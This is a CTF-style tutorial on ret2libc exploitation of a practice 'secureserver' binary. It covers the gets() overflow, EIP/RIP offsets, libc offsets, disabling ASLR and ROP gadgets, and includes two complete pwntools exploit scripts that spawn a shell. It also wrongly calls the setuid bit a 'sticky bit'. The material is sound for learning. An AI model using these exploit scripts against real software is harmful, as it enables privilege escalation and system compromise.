Skip to content

Latest commit

 

History

History

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
description
08/23/2023

⏪ ret2libc

Binary Exploitation used to be extremely intimidating to me, however, I took it day by day and built up brick by brick and all of a sudden, it's not so foreign and scary to me anymore. For anyone starting out, hopefully I influence you to do the same; simply just take your time and understand that consistency it truly key. It's truly come to a point where I can't get enough of it, and think about it all the time.

Introduction

This is primarily the attack you will use when you notice that the NX protection is ENABLED on the binary that you are attacking. This means that you do NOT have an executable stack to mess around with. This is because the stack memory is protected with the no execute (NX) bit enabled.

Why does this matter to us?

Well, in a typical stack-based buffer overflow, an attacker will be able to write their shellcode into the vulnerable program's stack and be able to execute it on the stack.

But, if the NX bit is ENABLED, we will not be able to execute our shellcode from the vulnerable program's stack.

How does ret2libc work?

This attack allows us to bypass the NX bit protection and divert the program's execution by re-using part of executable code found in the libc library. Note that this library is already automatically linked dynamically at compile time and loaded into the program's virtual memory space.

Let's reference this great diagram from Red Team Notes:

{% embed url="https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/return-to-libc-ret2libc" %}

Breakdown of what's going on:

  1. The EIP is being overwritten with the address of the system() function found in the libc library.
  2. Right after the address of system(), there's an address of the function exit(), this is so that once system() returns, the vulnerable program will jump to exit() which lives in the libc library as well. This is so that the vulnerable program will exit gracefully and as expected.
  3. Right after the address of exit(), there's a pointer to a memory location that contains the string /bin/sh which is the argument that will be passed to system() to execute a /bin/sh shell for us, granting us a shell.

We can see the NX bit is enabled on this 32-bit binary here:

Remember, this means anything that we inject on the stack traditionally, will NOT be executed.

We will be referencing CryptoCat's tutorial on ret2libc for this explanation and guide:

{% embed url="https://www.youtube.com/watch?v=0CFWHjc4B-I" %}

Our Target (x86 Tutorial)

This is a binary and challenge created by CryptoCat, download it here from GitHub to follow along with this tutorial:

{% embed url="https://github.com/Crypto-Cat/CTF/blob/main/pwn/binary_exploitation_101/06-return_to_libc/32-bit/secureserver" %}

Set Proper Permissions

sudo chown root:root secureserver
sudo chmod 4655 secureserver -- This will set the "sticky bit"
sudo chown root:root flag.txt
sudo chmod 600 flag.txt

This will allow/deny us from being able to do certain things like you normally would (in a good way).

Quick Crash Course on Linux Permissions

Going right to left, root is the group who owns the file and the other root is the user that owns the file.

You will have rwx bits that are possible here.

rwx means Read, Write, and Execute.

This will allow/deny you to be able to perform those actions on that file.

The first section (right to left) is the "Others" permission.

The second section is the "Group" permission.

The third section is the "Owner's" permission.

STICKY BIT: This means that anyone will be able to execute this file, no matter the user.

  • This can be seen with the RED marking rather than the yellow
  • Also, you can tell if it is a sticky bit from the S in the permission bits

For these files in particular, you will still be able to delete them because your directory is likely not root owned. However, if you did NOT set the sticky bit, you would not be able to execute this binary in particular! Also, with these permissions set, you can't view the flag unless you're root!

Enumeration

checksec:

  • 32-bit binary
  • NX ENABLED

file:

{% code overflow="wrap" %}

secureserver: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=ba7b32f02b9ce5948bcb57c33599de4ad17682de, for GNU/Linux 3.2.0, not stripped

{% endcode %}

  • 32-bit
  • Dynamically linked, meaning that instead of including all the code for our functions in the program itself or a header file, we are linking to the libc library at compile time to do this for us
    • So, all of this code is stored on YOUR libc library
  • This binary is not stripped, meaning that we still have all of our debugging symbols, making our life easier to reverse

Ghidra

So, since we are dynamically linking to the libc library this means that when we call a function found in the libc library, our program will access the Global Offset Table (GOT) and go to that GOT section and look to see what the address of the called function in the libc library. This will be different on every machine since there are different versions of libc. This means that we can RETURN to functions FOUND IN libc.

libc contains functions such as system() and we can pass the argument /bin/sh and we can return to the libc library and start executing functions in there!!! Hopefully granting us a shell.

You can actually see the GOT in Ghidra within the Program tree:

Let's look through our functions in our symbol tree to find a vulnerable function to target:

After some analysis, I have found a function containing the vulnerable and deprecated gets() function, this is now our target, receive_feedback().

So let's check out the function and see if we can find a buffer size we can attack:

void receive_feedback(void)

{
  char local_4c [68];
  
  puts("Please leave your comments for the server admin but DON\'T try to steal our flag.txt:\n");
  gets(local_4c);
  return;
}

So, we see a buffer size of 68 from our decompilation code for receive_feedback().

The next objective is to find the offset to the instruction pointer (EIP).

Finding the Offset to the Instruction Pointer (EIP)

Let's send a cyclic pattern of 100 characters to the buffer, we can utilize gdb for this:

{% code overflow="wrap" %}

cyclic 100
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa

{% endcode %}

Copy this and be ready to send it to the program.

You might be asking yourself: Why is our EIP address: 0x61616174?

Well, that is because that is the hex value of "taaa"!

We can confirm this by running hex and passing "taaa" as the argument:

hex taaa
74616161

Okay, cool, but why is it backwards? This is because this binary is representing data backwards due to it using little-endian format.

From this, we can see that we begin to overwrite the EIP with our pattern at "taaa", so we can then use cyclic -l taaa to find our offset to EIP:

So what if I told you there's even an easier way to find the offset to the instruction pointer?

In Ghidra, if we go to our target function and we find our EBP, we can convert the hex value to decimal with a calculator and find the offset too!!!

We see that 0x4c is the hex value of our EBP.

Let's convert that to decimal:

We get 76, how crazy is that??

Finding libc Base Address

So, we are going to overwrite the instruction pointer with a function within the libc library.

For this example, we will call system(), found in libc, and pass /bin/sh as an argument.

We can use pwndbg to search for /bin/sh in our library:

search -t "/bin/sh"

There is also another way that we can do this on a LOCAL system:

ldd <binary_name>

That address is where our libc library is located in memory.

Address Space Layout Randomization (ASLR)

However, this address is constantly subject to change as long as Address Space Layout Randomization (ASLR) is ENABLED.

This protection is in place automatically to prevent buffer overflows.

We can disable ASLR with the following command.

NOTE: It will be enabled again after a reboot and requires sudo or root privileges:

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space

We can see if we try to ldd our binary, we will see that our libc library address will not change.

The address 0xf7d81000 is the base address of the libc library.

Finding system() Offset

Great, so where is system() now?

We can use readelf to help us find this and pipe it to grep to better query our results:

readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
2166: 00048150    63 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.0

So 48150 is the OFFSET for system() to our base address for libc.

However, if we were attacking a server remotely, there are techniques that we could use to "leak" out functions and use the same technique above to find the offset to the base address of libc.

You can then add the offset of system() to the base address and you will get the address of the targeted function.

In conclusion, you want to find the base of the libc library and then you will be able to find the offsets to other functions.

  • Don't worry, we will go more in depth into this in the future

Finding /bin/sh String Offset

So, if we use strings inside of the libc library, we will be able to find the offset to our base address for that string.

strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
1bd0f5 /bin/sh

1bd0f5 is the OFFSET for the /bin/sh string to the libc.

Exploit Development

When it comes to building an exploit for ret2libc, this is an excellent template to use.

exploit.py:

{% code lineNumbers="true" %}

from pwn import *


# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())


# Binary filename
exe = './secureserver'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Change logging level to help with debugging (error/warning/info/debug)
context.log_level = 'debug'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

io = start()

# Lib-c offsets, found manually (ASLR_OFF)
libc_base = 0xf7d81000
system = libc_base + 0x48150
binsh = libc_base + 0x1bd0f5

# Print out our addresses
info('libc_base: %#x', libc_base)
info('system: %#x', system)
info('binsh: %#x', binsh)

# How many bytes to the instruction pointer (EIP)?
padding = 76

payload = flat(
    asm('nop') * padding,  # Padding up to EIP
    system,  # Address of system function in libc
    0x0,  # Return pointer -- this can be garbage, we have to do this because we're attacking x86
    binsh  # Address of /bin/sh in libc
)

# Write payload to file
write('payload', payload)

# Exploit
io.sendlineafter(b':', payload)

# Get flag/shell
io.interactive()

{% endcode %}

Be sure to populate the variables with the proper addresses/offsets.

Successful automated exploit

Analyzing the Payload in gdb

Throwing our program back in gdb and viewing what is going on is pretty cool stuff. It allows you to gain a more intuitive understanding of what is going on in memory and how your exploit works if you ever needed to troubleshoot it.

Set a breakpoint for main with b main.

Run the binary with r.

Great, we can now start examining our addresses and what data is located within them.

Examing libc base address:

pwndbg> x 0xf7d81000
0xf7d81000:     0x464c457f

In English: x is examine, and the address is our libc base address.

Examine system() minus the offset of system():

pwndbg> x/s 0xf7dc9150 - 0x48150
0xf7d81000:     "\177ELF\001\001\001\003"

In English: x is examine, /s is convert to string, and the offset is that of system().

If you see ELF, this means we are simply at the base of the binary and that everything is aligning properly.

Now this part is interesting, remember when I said above in the stack diagram that was illustrating the overflow?

So in Step 3, the address is a pointer, which means if we print out the data in hex, we will get a string back. So there is no need to examine/convert to a string!

pwndbg> x 0xf7f3e0f5
0xf7f3e0f5:     "/bin/sh"

In English: x is examine, and the address is our "/bin/sh".

Manual Exploitation w/ our Payload

We can actually use cat with our payload as the argument and pipe it to our binary to exploit it as well and gain a shell:

cat payload - | ./secureserver

Just be warned that STDOUT is not reflected from the first command for some reason.

Our Target (x64 Tutorial)

We will be attacking the same target/binary, except this time it is compiled as an x64 binary.

The difference is that we are going to have to approach parameters differently here on an x64 target. So we are going to need to POP RDI with a ROP gadget.

Remember, x86 the binary will search the stack and x64 will search in registers.

{% embed url="https://github.com/Crypto-Cat/CTF/blob/main/pwn/binary_exploitation_101/06-return_to_libc/64-bit/secureserver" %}

Set Proper Permissions

sudo chown root:root secureserver
sudo chmod 4655 secureserver -- This will set the "sticky bit"
sudo chown root:root flag.txt
sudo chmod 600 flag.txt

Enumeration

file:

{% code overflow="wrap" %}

secureserver: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=f890ad80b62339e815e93e095690235d1466bfbb, for GNU/Linux 3.2.0, not stripped

{% endcode %}

  • x64 Binary -- Need ROP gadgets to POP values into the correct registers
  • Dynamically linked, which is very important to us as we will need to divert execution from our vulnerable function's return address via overwrite to the libc library
  • Not stripped, so this will make our lives easier to find lucrative details in Ghidra/gdb

checksec:

    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000
  • NX is ENABLED
  • This makes it a fantastic target for the ret2libc exploitation technique

Finding ret ROP Gadgets with ropper

I kept running into stack-alignment issues presumably because I am on Ubuntu, which is known for these types of issues pertaining to binex. So, I had to add a ret ROP gadget in order for my exploit to work.

With that said, you may not need this.

ropper --file secureserver --search "ret"
[INFO] Load gadgets from cache
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: ret

[INFO] File: secureserver
0x0000000000401016: ret;

To fix our issue, I am simply using a return gadget.

You can see that the address, 0x401016 is what we need to return.

Finding POP RDI ROP Gadgets with ropper

ropper --file secureserver --search "pop rdi"
[INFO] Load gadgets for section: LOAD
[LOAD] loading... 100%
[LOAD] removing double gadgets... 100%
[INFO] Searching for gadgets: pop rdi

[INFO] File: secureserver
0x000000000040120b: pop rdi; ret;

You can see that the address, 0x40120b is what we will need to POP "/bin/sh" into the RDI register as it is our first parameter/argument.

NOTE: Be sure to add this to your exploit code.

So, when the system() function is called, it will look in the RDI register for this string.

Finding Base Address for 64-bit libc Library

ldd secureserver
        linux-vdso.so.1 (0x00007ffff7fc1000)
        libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007ffff7d8b000)
        /lib64/ld-linux-x86-64.so.2 (0x00007ffff7fc3000)

64-bit address for the libc base: 0x7ffff7d8b000

Finding system() Offset

readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep system
  1481: 0000000000050d60    45 FUNC    WEAK   DEFAULT   15 system@@GLIBC_2.2.5

Our offset to system() from the base address is: 50d60

Finding "/bin/sh" String Offset

strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"
 1d8698 /bin/sh

Our offset for the "/bin/sh" string from the base address is: 1d8698

Finding the Offset to the Instruction Pointer (RIP)

Load up Ghidra and navigate to the vulnerable function, receive_feedback() in the Symbol Tree:

We see 0x48 is the offset, so let's convert that to decimal to get our padding for our payload:

This means that our padding will be 72.

Exploit Development (pwntools)

Be sure to add the addresses, offsets, and padding we gathered above to your exploit code:

exploit.py:

{% code lineNumbers="true" %}

from pwn import *


# Allows you to switch between local/GDB/remote from terminal
def start(argv=[], *a, **kw):
    if args.GDB:  # Set GDBscript below
        return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
    elif args.REMOTE:  # ('server', 'port')
        return remote(sys.argv[1], sys.argv[2], *a, **kw)
    else:  # Run locally
        return process([exe] + argv, *a, **kw)


# Specify GDB script here (breakpoints etc)
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())


# Binary filename
exe = './secureserver'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Change logging level to help with debugging (error/warning/info/debug)
context.log_level = 'debug'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

io = start()

# Lib-c offsets, found manually (ASLR_OFF)
libc_base = 0x7ffff7d8b000
system = libc_base + 0x50d60
binsh = libc_base + 0x1d8698

# POP RDI gadget (found with ropper)
ret = 0x401016
pop_rdi = 0x40120b

# How many bytes to the instruction pointer (RIP)?
padding = 72

payload = flat(
    asm('nop') * padding,  # Padding up to RIP
    ret,
    pop_rdi,  # Pop the following address into the RDI register
    binsh,  # Address of /bin/sh in libc
    system,  # Address of system function in libc
)

# Write payload to file
write('payload', payload)

# Exploit
io.sendlineafter(b':', payload)

# Get flag/shell
io.interactive()

{% endcode %}

Exploit Code Analysis

Breaking down our payload:

Our padding of 72-bytes, this was obtained from finding the offset of our vulnerable function's EBP to our EIP.

Write the padding with asm('nop') * padding,.

We will then use our ret ROP gadget to return to aid in stack alignment.

We then utilize pop_rdi to POP the next value ONTO the stack into the RDI register.

  • The value is of course binsh

Lastly, we will make a call to system().

NOTE: Not shown, however, we then write our payload to a file named, payload via:

write('payload', payload)

We will then use sendlineafter to deliver our payload variable after the : that is found in console which is the last character before awaiting STDIN from the user of the program:

io.sendlineafter(b':', payload)

Automated Result

python3 exploit.py

Manual Exploitation Result

cat payload - | ./secureserver